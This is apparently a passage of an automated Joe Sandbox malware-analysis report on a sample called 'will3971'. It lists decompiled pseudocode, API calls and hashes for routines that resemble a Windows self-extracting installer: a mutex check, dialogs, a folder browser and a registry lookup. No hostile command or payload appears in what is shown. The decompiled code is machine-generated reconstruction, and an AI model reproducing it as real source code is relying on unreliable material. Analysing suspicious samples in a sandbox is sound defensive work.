                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2DAE
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 002F2DBD
                                                • CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 002F2E0A
                                                  • Part of subcall function 002F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                  • Part of subcall function 002F44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
                                                • API String ID: 1002816675-2051202908
                                                • Opcode ID: 84e3317380f27ae0efff4331ca07cb7184599341afc21cefc69cd2ff4936010b
                                                • Instruction ID: e18cf60199f76a843f010f76cfc983601390bbffdac88454521b5d1fed03b42b
                                                • Opcode Fuzzy Hash: 84e3317380f27ae0efff4331ca07cb7184599341afc21cefc69cd2ff4936010b
                                                • Instruction Fuzzy Hash: 0B51E47023030EEAE710AB24AC4EB7BE698DB837E0F504039BB45D51D1DBA498B5CA11
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E002F34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t9;
                                                				void* _t12;
                                                				void* _t13;
                                                				void* _t17;
                                                				void* _t23;
                                                				void* _t25;
                                                				struct HWND__* _t35;
                                                				struct HWND__* _t38;
                                                				void* _t39;
                                                
                                                				_t9 = _a8 - 0x10;
                                                				if(_t9 == 0) {
                                                					__eflags = 1;
                                                					L19:
                                                					_push(0);
                                                					 *0x2f91d8 = 1;
                                                					L20:
                                                					_push(_a4);
                                                					L21:
                                                					EndDialog();
                                                					L22:
                                                					return 1;
                                                				}
                                                				_push(1);
                                                				_pop(1);
                                                				_t12 = _t9 - 0xf2;
                                                				if(_t12 == 0) {
                                                					__eflags = _a12 - 0x1b;
                                                					if(_a12 != 0x1b) {
                                                						goto L22;
                                                					}
                                                					goto L19;
                                                				}
                                                				_t13 = _t12 - 0xe;
                                                				if(_t13 == 0) {
                                                					_t35 = _a4;
                                                					 *0x2f8584 = _t35;
                                                					E002F43D0(_t35, GetDesktopWindow());
                                                					__eflags =  *0x2f8184; // 0x1
                                                					if(__eflags != 0) {
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                					}
                                                					SetWindowTextA(_t35, "lega");
                                                					_t17 = CreateThread(0, 0, E002F4FE0, 0, 0, 0x2f8798);
                                                					 *0x2f879c = _t17;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						goto L22;
                                                					} else {
                                                						E002F44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						_push(_t35);
                                                						goto L21;
                                                					}
                                                				}
                                                				_t23 = _t13 - 1;
                                                				if(_t23 == 0) {
                                                					__eflags = _a12 - 2;
                                                					if(_a12 != 2) {
                                                						goto L22;
                                                					}
                                                					ResetEvent( *0x2f858c);
                                                					_t38 =  *0x2f8584; // 0x0
                                                					_t25 = E002F44B9(_t38, 0x4b2, 0x2f1140, 0, 0x20, 4);
                                                					__eflags = _t25 - 6;
                                                					if(_t25 == 6) {
                                                						L11:
                                                						 *0x2f91d8 = 1;
                                                						SetEvent( *0x2f858c);
                                                						_t39 =  *0x2f879c; // 0x0
                                                						E002F3680(_t39);
                                                						_push(0);
                                                						goto L20;
                                                					}
                                                					__eflags = _t25 - 1;
                                                					if(_t25 == 1) {
                                                						goto L11;
                                                					}
                                                					SetEvent( *0x2f858c);
                                                					goto L22;
                                                				}
                                                				if(_t23 == 0xe90) {
                                                					TerminateThread( *0x2f879c, 0);
                                                					EndDialog(_a4, _a12);
                                                					return 1;
                                                				}
                                                				return 0;
                                                			}












                                                0x002f34fb
                                                0x002f34fe
                                                0x002f3665
                                                0x002f3666
                                                0x002f3666
                                                0x002f3668
                                                0x002f366e
                                                0x002f366e
                                                0x002f3671
                                                0x002f3671
                                                0x002f3677
                                                0x00000000
                                                0x002f3677
                                                0x002f3504
                                                0x002f3506
                                                0x002f3507
                                                0x002f350c
                                                0x002f365b
                                                0x002f365f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x002f3661
                                                0x002f3512
                                                0x002f3515
                                                0x002f35be
                                                0x002f35c1
                                                0x002f35d1
                                                0x002f35d8
                                                0x002f35de
                                                0x002f35f8
                                                0x002f3617
                                                0x002f3617
                                                0x002f3623
                                                0x002f3637
                                                0x002f363d
                                                0x002f3642
                                                0x002f3644
                                                0x00000000
                                                0x002f3646
                                                0x002f3652
                                                0x002f3657
                                                0x002f3658
                                                0x00000000
                                                0x002f3658
                                                0x002f3644
                                                0x002f351b
                                                0x002f351d
                                                0x002f354f
                                                0x002f3553
                                                0x00000000
                                                0x00000000
                                                0x002f355f
                                                0x002f3565
                                                0x002f357c
                                                0x002f3581
                                                0x002f3584
                                                0x002f359b
                                                0x002f35a1
                                                0x002f35a7
                                                0x002f35ad
                                                0x002f35b3
                                                0x002f35b8
                                                0x00000000
                                                0x002f35b8
                                                0x002f3586
                                                0x002f3588
                                                0x00000000
                                                0x00000000
                                                0x002f3590
                                                0x00000000
                                                0x002f3590
                                                0x002f3524
                                                0x002f3535
                                                0x002f3541
                                                0x00000000
                                                0x002f3549
                                                0x00000000

                                                APIs
                                                • TerminateThread.KERNEL32(00000000), ref: 002F3535
                                                • EndDialog.USER32(?,?), ref: 002F3541
                                                • ResetEvent.KERNEL32 ref: 002F355F
                                                • SetEvent.KERNEL32(002F1140,00000000,00000020,00000004), ref: 002F3590
                                                • GetDesktopWindow.USER32 ref: 002F35C7
                                                • GetDlgItem.USER32(?,0000083B), ref: 002F35F1
                                                • SendMessageA.USER32(00000000), ref: 002F35F8
                                                • GetDlgItem.USER32(?,0000083B), ref: 002F3610
                                                • SendMessageA.USER32(00000000), ref: 002F3617
                                                • SetWindowTextA.USER32(?,lega), ref: 002F3623
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,002F8798), ref: 002F3637
                                                • EndDialog.USER32(?,00000000), ref: 002F3671
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                • String ID: lega
                                                • API String ID: 2406144884-245445314
                                                • Opcode ID: 674c7ca7e0da49afe608532bbd126ca7e76409387fa39dc1e1d4602c37d5a8bc
                                                • Instruction ID: 329c23e25496b565b9f38e883cd761f6d48a6bc9cb4e317cf1e1f436e80733d9
                                                • Opcode Fuzzy Hash: 674c7ca7e0da49afe608532bbd126ca7e76409387fa39dc1e1d4602c37d5a8bc
                                                • Instruction Fuzzy Hash: 9531C874220209BBD7109F24BC4DE3BBA68E789BE0F504535FB0AD52A4CB718920CE55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E002F4224(char __ecx) {
                                                				char* _v8;
                                                				_Unknown_base(*)()* _v12;
                                                				_Unknown_base(*)()* _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				char* _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				_Unknown_base(*)()* _t26;
                                                				_Unknown_base(*)()* _t28;
                                                				_Unknown_base(*)()* _t29;
                                                				_Unknown_base(*)()* _t32;
                                                				char _t42;
                                                				char* _t44;
                                                				char* _t61;
                                                				void* _t63;
                                                				char* _t65;
                                                				struct HINSTANCE__* _t66;
                                                				char _t67;
                                                				void* _t71;
                                                				char _t76;
                                                				intOrPtr _t85;
                                                
                                                				_t67 = __ecx;
                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                				if(_t66 == 0) {
                                                					_t63 = 0x4c2;
                                                					L22:
                                                					E002F44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                					return 0;
                                                				}
                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                				_v12 = _t26;
                                                				if(_t26 == 0) {
                                                					L20:
                                                					FreeLibrary(_t66);
                                                					_t63 = 0x4c1;
                                                					goto L22;
                                                				}
                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                				_v20 = _t28;
                                                				if(_t28 == 0) {
                                                					goto L20;
                                                				}
                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                				_v16 = _t29;
                                                				if(_t29 == 0) {
                                                					goto L20;
                                                				}
                                                				_t76 =  *0x2f88c0; // 0x0
                                                				if(_t76 != 0) {
                                                					L10:
                                                					 *0x2f87a0 = 0;
                                                					_v52 = _t67;
                                                					_v48 = 0;
                                                					_v44 = 0;
                                                					_v40 = 0x2f8598;
                                                					_v36 = 1;
                                                					_v32 = E002F4200;
                                                					_v28 = 0x2f88c0;
                                                					 *0x2fa288( &_v52);
                                                					_t32 =  *_v12();
                                                					if(_t71 != _t71) {
                                                						asm("int 0x29");
                                                					}
                                                					_v12 = _t32;
                                                					if(_t32 != 0) {
                                                						 *0x2fa288(_t32, 0x2f88c0);
                                                						 *_v16();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                						if( *0x2f88c0 != 0) {
                                                							E002F1680(0x2f87a0, 0x104, 0x2f88c0);
                                                						}
                                                						 *0x2fa288(_v12);
                                                						 *_v20();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                					}
                                                					FreeLibrary(_t66);
                                                					_t85 =  *0x2f87a0; // 0x0
                                                					return 0 | _t85 != 0x00000000;
                                                				} else {
                                                					GetTempPathA(0x104, 0x2f88c0);
                                                					_t61 = 0x2f88c0;
                                                					_t4 =  &(_t61[1]); // 0x2f88c1
                                                					_t65 = _t4;
                                                					do {
                                                						_t42 =  *_t61;
                                                						_t61 =  &(_t61[1]);
                                                					} while (_t42 != 0);
                                                					_t5 = _t61 - _t65 + 0x2f88c0; // 0x5f1181
                                                					_t44 = CharPrevA(0x2f88c0, _t5);
                                                					_v8 = _t44;
                                                					if( *_t44 == 0x5c &&  *(CharPrevA(0x2f88c0, _t44)) != 0x3a) {
                                                						 *_v8 = 0;
                                                					}
                                                					goto L10;
                                                				}
                                                			}




























                                                0x002f4234
                                                0x002f423c
                                                0x002f4240
                                                0x002f43b2
                                                0x002f43b7
                                                0x002f43c0
                                                0x00000000
                                                0x002f43c5
                                                0x002f424c
                                                0x002f4252
                                                0x002f4257
                                                0x002f43a4
                                                0x002f43a5
                                                0x002f43ab
                                                0x00000000
                                                0x002f43ab
                                                0x002f4263
                                                0x002f4269
                                                0x002f426e
                                                0x00000000
                                                0x00000000
                                                0x002f427a
                                                0x002f4280
                                                0x002f4285
                                                0x00000000
                                                0x00000000
                                                0x002f428d
                                                0x002f4293
                                                0x002f42e6
                                                0x002f42e9
                                                0x002f42ef
                                                0x002f42f4
                                                0x002f42f7
                                                0x002f4300
                                                0x002f4307
                                                0x002f430e
                                                0x002f4315
                                                0x002f431c
                                                0x002f4322
                                                0x002f4326
                                                0x002f432d
                                                0x002f432d
                                                0x002f432f
                                                0x002f4334
                                                0x002f4343
                                                0x002f4349
                                                0x002f434d
                                                0x002f4354
                                                0x002f4354
                                                0x002f435d
                                                0x002f436e
                                                0x002f436e
                                                0x002f437d
                                                0x002f4383
                                                0x002f4387
                                                0x002f438e
                                                0x002f438e
                                                0x002f4387
                                                0x002f4391
                                                0x002f4399
                                                0x00000000
                                                0x002f4295
                                                0x002f429f
                                                0x002f42a5
                                                0x002f42aa
                                                0x002f42aa
                                                0x002f42ad
                                                0x002f42ad
                                                0x002f42af
                                                0x002f42b0
                                                0x002f42b6
                                                0x002f42c2
                                                0x002f42c8
                                                0x002f42ce
                                                0x002f42e4
                                                0x002f42e4
                                                0x00000000
                                                0x002f42ce

                                                APIs
                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 002F4236
                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 002F424C
                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 002F4263
                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 002F427A
                                                • GetTempPathA.KERNEL32(00000104,002F88C0,?,00000001), ref: 002F429F
                                                • CharPrevA.USER32(002F88C0,005F1181,?,00000001), ref: 002F42C2
                                                • CharPrevA.USER32(002F88C0,00000000,?,00000001), ref: 002F42D6
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002F4391
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 002F43A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                • API String ID: 1865808269-1731843650
                                                • Opcode ID: ea54891e47fbd8e318947cb09ff0a9eb6be663ccbd6ec7ba37025343482e2ac2
                                                • Instruction ID: 616b5b670b247872f69e4da93c89d281a8d118681849c24aaa758036af3d1110
                                                • Opcode Fuzzy Hash: ea54891e47fbd8e318947cb09ff0a9eb6be663ccbd6ec7ba37025343482e2ac2
                                                • Instruction Fuzzy Hash: 4441C2B4A1020DAFDB11AF64EC98A7FFBA4EB463D4F5401B9EB45A2251CBB48C11C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E002F44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                				signed int _v8;
                                                				char _v64;
                                                				char _v576;
                                                				void* _v580;
                                                				struct HWND__* _v584;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t34;
                                                				void* _t37;
                                                				signed int _t39;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				signed int _t49;
                                                				signed int _t52;
                                                				void* _t54;
                                                				intOrPtr _t55;
                                                				intOrPtr _t58;
                                                				intOrPtr _t59;
                                                				int _t64;
                                                				void* _t66;
                                                				intOrPtr* _t67;
                                                				signed int _t69;
                                                				intOrPtr* _t73;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t77;
                                                				void* _t80;
                                                				void* _t81;
                                                				void* _t82;
                                                				intOrPtr* _t84;
                                                				void* _t85;
                                                				signed int _t89;
                                                
                                                				_t75 = __edx;
                                                				_t34 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t34 ^ _t89;
                                                				_v584 = __ecx;
                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                				_t67 = _a4;
                                                				_t69 = 0xd;
                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                				_t80 = _t83 + _t69 + _t69;
                                                				_v580 = _t37;
                                                				asm("movsb");
                                                				if(( *0x2f8a38 & 0x00000001) != 0) {
                                                					_t39 = 1;
                                                				} else {
                                                					_v576 = 0;
                                                					LoadStringA( *0x2f9a3c, _t75,  &_v576, 0x200);
                                                					if(_v576 != 0) {
                                                						_t73 =  &_v576;
                                                						_t16 = _t73 + 1; // 0x1
                                                						_t75 = _t16;
                                                						do {
                                                							_t43 =  *_t73;
                                                							_t73 = _t73 + 1;
                                                						} while (_t43 != 0);
                                                						_t84 = _v580;
                                                						_t74 = _t73 - _t75;
                                                						if(_t84 == 0) {
                                                							if(_t67 == 0) {
                                                								_t27 = _t74 + 1; // 0x2
                                                								_t83 = _t27;
                                                								_t44 = LocalAlloc(0x40, _t83);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									_t75 = _t83;
                                                									_t74 = _t80;
                                                									E002F1680(_t80, _t83,  &_v576);
                                                									goto L23;
                                                								}
                                                							} else {
                                                								_t76 = _t67;
                                                								_t24 = _t76 + 1; // 0x1
                                                								_t85 = _t24;
                                                								do {
                                                									_t55 =  *_t76;
                                                									_t76 = _t76 + 1;
                                                								} while (_t55 != 0);
                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                								_t83 = _t25 + _t74;
                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                								_t80 = _t44;
                                                								if(_t80 == 0) {
                                                									goto L6;
                                                								} else {
                                                									E002F171E(_t80, _t83,  &_v576, _t67);
                                                									goto L23;
                                                								}
                                                							}
                                                						} else {
                                                							_t77 = _t67;
                                                							_t18 = _t77 + 1; // 0x1
                                                							_t81 = _t18;
                                                							do {
                                                								_t58 =  *_t77;
                                                								_t77 = _t77 + 1;
                                                							} while (_t58 != 0);
                                                							_t75 = _t77 - _t81;
                                                							_t82 = _t84 + 1;
                                                							do {
                                                								_t59 =  *_t84;
                                                								_t84 = _t84 + 1;
                                                							} while (_t59 != 0);
                                                							_t21 = _t74 + 0x64; // 0x65
                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                							_t80 = _t44;
                                                							if(_t80 == 0) {
                                                								goto L6;
                                                							} else {
                                                								_push(_v580);
                                                								E002F171E(_t80, _t83,  &_v576, _t67);
                                                								L23:
                                                								MessageBeep(_a12);
                                                								if(E002F681F(_t67) == 0) {
                                                									L25:
                                                									_t49 = 0x10000;
                                                								} else {
                                                									_t54 = E002F67C9(_t74, _t74);
                                                									_t49 = 0x190000;
                                                									if(_t54 == 0) {
                                                										goto L25;
                                                									}
                                                								}
                                                								_t52 = MessageBoxA(_v584, _t80, "lega", _t49 | _a12 | _a16);
                                                								_t83 = _t52;
                                                								LocalFree(_t80);
                                                								_t39 = _t52;
                                                							}
                                                						}
                                                					} else {
                                                						if(E002F681F(_t67) == 0) {
                                                							L4:
                                                							_t64 = 0x10010;
                                                						} else {
                                                							_t66 = E002F67C9(0, 0);
                                                							_t64 = 0x190010;
                                                							if(_t66 == 0) {
                                                								goto L4;
                                                							}
                                                						}
                                                						_t44 = MessageBoxA(_v584,  &_v64, "lega", _t64);
                                                						L6:
                                                						_t39 = _t44 | 0xffffffff;
                                                					}
                                                				}
                                                				return E002F6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                			}



































                                                0x002f44b9
                                                0x002f44c4
                                                0x002f44cb
                                                0x002f44d8
                                                0x002f44e4
                                                0x002f44eb
                                                0x002f44ee
                                                0x002f44ef
                                                0x002f44ef
                                                0x002f44f1
                                                0x002f44f7
                                                0x002f44f8
                                                0x002f467b
                                                0x002f44fe
                                                0x002f4509
                                                0x002f4518
                                                0x002f4525
                                                0x002f4562
                                                0x002f4568
                                                0x002f4568
                                                0x002f456b
                                                0x002f456b
                                                0x002f456d
                                                0x002f456e
                                                0x002f4572
                                                0x002f4578
                                                0x002f457c
                                                0x002f45cb
                                                0x002f4607
                                                0x002f4607
                                                0x002f460d
                                                0x002f4613
                                                0x002f4617
                                                0x00000000
                                                0x002f461d
                                                0x002f4623
                                                0x002f4626
                                                0x002f4628
                                                0x00000000
                                                0x002f4628
                                                0x002f45cd
                                                0x002f45cd
                                                0x002f45cf
                                                0x002f45cf
                                                0x002f45d2
                                                0x002f45d2
                                                0x002f45d4
                                                0x002f45d5
                                                0x002f45db
                                                0x002f45de
                                                0x002f45e3
                                                0x002f45e9
                                                0x002f45ed
                                                0x00000000
                                                0x002f45f3
                                                0x002f45fd
                                                0x00000000
                                                0x002f4602
                                                0x002f45ed
                                                0x002f457e
                                                0x002f457e
                                                0x002f4580
                                                0x002f4580
                                                0x002f4583
                                                0x002f4583
                                                0x002f4585
                                                0x002f4586
                                                0x002f458a
                                                0x002f458c
                                                0x002f458f
                                                0x002f458f
                                                0x002f4591
                                                0x002f4592
                                                0x002f459b
                                                0x002f459e
                                                0x002f45a3
                                                0x002f45a9
                                                0x002f45ad
                                                0x00000000
                                                0x002f45af
                                                0x002f45af
                                                0x002f45bf
                                                0x002f462d
                                                0x002f4630
                                                0x002f463d
                                                0x002f464e
                                                0x002f464e
                                                0x002f463f
                                                0x002f4640
                                                0x002f4647
                                                0x002f464c
                                                0x00000000
                                                0x00000000
                                                0x002f464c
                                                0x002f4666
                                                0x002f466d
                                                0x002f466f
                                                0x002f4675
                                                0x002f4675
                                                0x002f45ad
                                                0x002f4527
                                                0x002f452e
                                                0x002f453f
                                                0x002f453f
                                                0x002f4530
                                                0x002f4531
                                                0x002f4538
                                                0x002f453d
                                                0x00000000
                                                0x00000000
                                                0x002f453d
                                                0x002f4554
                                                0x002f455a
                                                0x002f455a
                                                0x002f455a
                                                0x002f4525
                                                0x002f468c

                                                APIs
                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 002F4518
                                                • MessageBoxA.USER32(?,?,lega,00010010), ref: 002F4554
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 002F45A3
                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 002F45E3
                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 002F460D
                                                • MessageBeep.USER32(00000000), ref: 002F4630
                                                • MessageBoxA.USER32(?,00000000,lega,00000000), ref: 002F4666
                                                • LocalFree.KERNEL32(00000000), ref: 002F466F
                                                  • Part of subcall function 002F681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 002F686E
                                                  • Part of subcall function 002F681F: GetSystemMetrics.USER32(0000004A), ref: 002F68A7
                                                  • Part of subcall function 002F681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 002F68CC
                                                  • Part of subcall function 002F681F: RegQueryValueExA.ADVAPI32(?,002F1140,00000000,?,?,0000000C), ref: 002F68F4
                                                  • Part of subcall function 002F681F: RegCloseKey.ADVAPI32(?), ref: 002F6902
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.371408644.00000000002F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002F0000, based on PE: true
                                                • Associated: 00000003.00000002.371399319.00000000002F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371420971.00000000002F8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000003.00000002.371427117.00000000002FC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_2f0000_will3971.jbxd
                                                Similarity
                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                • String ID: LoadString() Error. Could not load string resource.$lega
                                                • API String ID: 3244514340-2134167237
                                                • Opcode ID: 2e7c58bf92c6456b4a31edd5a78f29e2c2f4401c26419b2bb129064b9a9f786c
                                                • Instruction ID: 33eba325abeabd438da19b1d876d1a642b9370c8c2c918a0366fc5f512dd9083
                                                • Opcode Fuzzy Hash: 2e7c58bf92c6456b4a31edd5a78f29e2c2f4401c26419b2bb129064b9a9f786c
                                                • Instruction Fuzzy Hash: F451D37191011E9BDB21AF289C48BBBFB69EF45390F0441B4FE09A7241DBB19E65CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E002F2773(CHAR* __ecx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v269;
                                                				CHAR* _v276;
                                                				int _v280;
                                                				void* _v284;
                                                				int _v288;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr _t34;
                                                				int _t45;
                                                				int* _t50;
                                                				CHAR* _t52;
                                                				CHAR* _t61;
                                                				char* _t62;
                                                				int _t63;
                                                				CHAR* _t64;
                                                				signed int _t65;
                                                
                                                				_t52 = __ecx;
                                                				_t23 =  *0x2f8004; // 0x404cc811
                                                				_v8 = _t23 ^ _t65;
                                                				_t62 = _a4;
                                                				_t50 = 0;
                                                				_t61 = __ecx;
                                                				_v276 = _t62;
                                                				 *((char*)(__ecx)) = 0;
                                                				if( *_t62 != 0x23) {
                                                					_t63 = 0x104;
                                                					goto L14;
                                                				} else {
                                                					_t64 = _t62 + 1;
                                                					_v269 = CharUpperA( *_t64);
                                                					_v276 = CharNextA(CharNextA(_t64));
                                                					_t63 = 0x104;
                                                					_t34 = _v269;
                                                					if(_t34 == 0x53) {
                                                						L14:
                                                						GetSystemDirectoryA(_t61, _t63);
                                                						goto L15;
                                                					} else {
                                                						if(_t34 == 0x57) {
                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                							goto L16;
                                                						} else {
                                                							_push(_t52);
                                                							_v288 = 0x104;
                                                							E002F1781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                							_t59 = 0x104;
                                                							E002F658A( &_v268, 0x104, _v276);
                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                								L16:
                                                								_t59 = _t63;
                                                								E002F658A(_t61, _t63, _v276);
                                                							} else {
                                                								if(RegQueryValueExA(_v284, 0x2f1140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                									_t45 = _v280;
                                                									if(_t45 != 2) {
                                                										L9:
                                                										if(_t45 == 1) {
                                                											goto L10;
                                                										}
                                                									} else {
                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                											_t45 = _v280;
                                                											goto L9;
                                                										} else {
                                                											_t59 = 0x104;
                                                											E002F1680(_t61, 0x104,  &_v268);
                                                											L10:
                                                											_t50 = 1;
                                                										}
                                                									}
                                                								}
                                                								RegCloseKey(_v284);
                                                								L15:
                                                								if(_t50 == 0) {
                                                									goto L16;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E002F6CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                			}























                                                0x002f2773
                                                0x002f277e
                                                0x002f2785
                                                0x002f278a
                                                0x002f278d
                                                0x002f2790
                                                0x002f2792
                                                0x002f2798
                                                0x002f279d
                                                0x002f28b2
                                                0x00000000
                                                0x002f27a3
                                                0x002f27a3
                                                0x002f27af
                                                0x002f27c2
                                                0x002f27c8
                                                0x002f27cd
                                                0x002f27d5
                                                0x002f28b7
                                                0x002f28b9
                                                0x00000000
                                                0x002f27db
                                                0x002f27dd
                                                0x002f28aa
                                                0x00000000
                                                0x002f27e3
                                                0x002f27e3
                                                0x002f27ec
                                                0x002f27f8
                                                0x002f2803
                                                0x002f280b
                                                0x002f2831
                                                0x002f28c3
                                                0x002f28c9
                                                0x002f28cd
                                                0x002f2837
                                                0x002f285a
                                                0x002f285c
                                                0x002f2865
                                                0x002f2892
                                                0x002f2895
                                                0x00000000
                                                0x00000000
                                                0x002f2867
                                                0x002f2878
                                                0x002f288c
                                                0x00000000
                                                0x002f287a
                                                0x002f2880
                                                0x002f2885
                                                0x002f2897
                                                0x002f2899
                                                0x002f2899
                                                0x002f2878
                                                0x002f2865
                                                0x002f28a0
                                                0x002f28bf
                                                0x002f28c1
                                                0x00000000
                                                0x00000000
                                                0x002f28c1
                                                0x002f2831
                                                0x002f27dd
                                                0x002f27d5
                                                0x002f28e5

                                                APIs
                                                • CharUpperA.USER32(404CC811,00000000,00000000,00000000), ref: 002F27A8
                                                • CharNextA.USER32(0000054D), ref: 002F27B5
                                                • CharNextA.USER32(00000000), ref: 002F27BC
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 002F2829
